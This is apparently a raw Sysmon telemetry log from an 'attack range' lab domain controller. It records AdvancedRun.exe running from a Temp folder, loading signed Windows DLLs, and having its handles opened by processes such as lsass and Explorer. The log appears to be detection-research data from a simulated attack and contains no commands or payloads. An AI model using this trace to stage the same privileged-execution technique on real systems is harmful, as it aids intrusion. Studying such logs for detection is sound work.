17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.365{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924284Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.365{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924283Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.365{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924282Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.365{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924281Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.365{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924280Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.365{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003924279Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.193{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924278Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.193{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924277Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.068{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924276Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.068{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924275Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.068{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924274Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.068{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003924273Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.068{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003924272Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.068{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003924271Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.068{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003924270Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003924269Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924268Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.052{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft 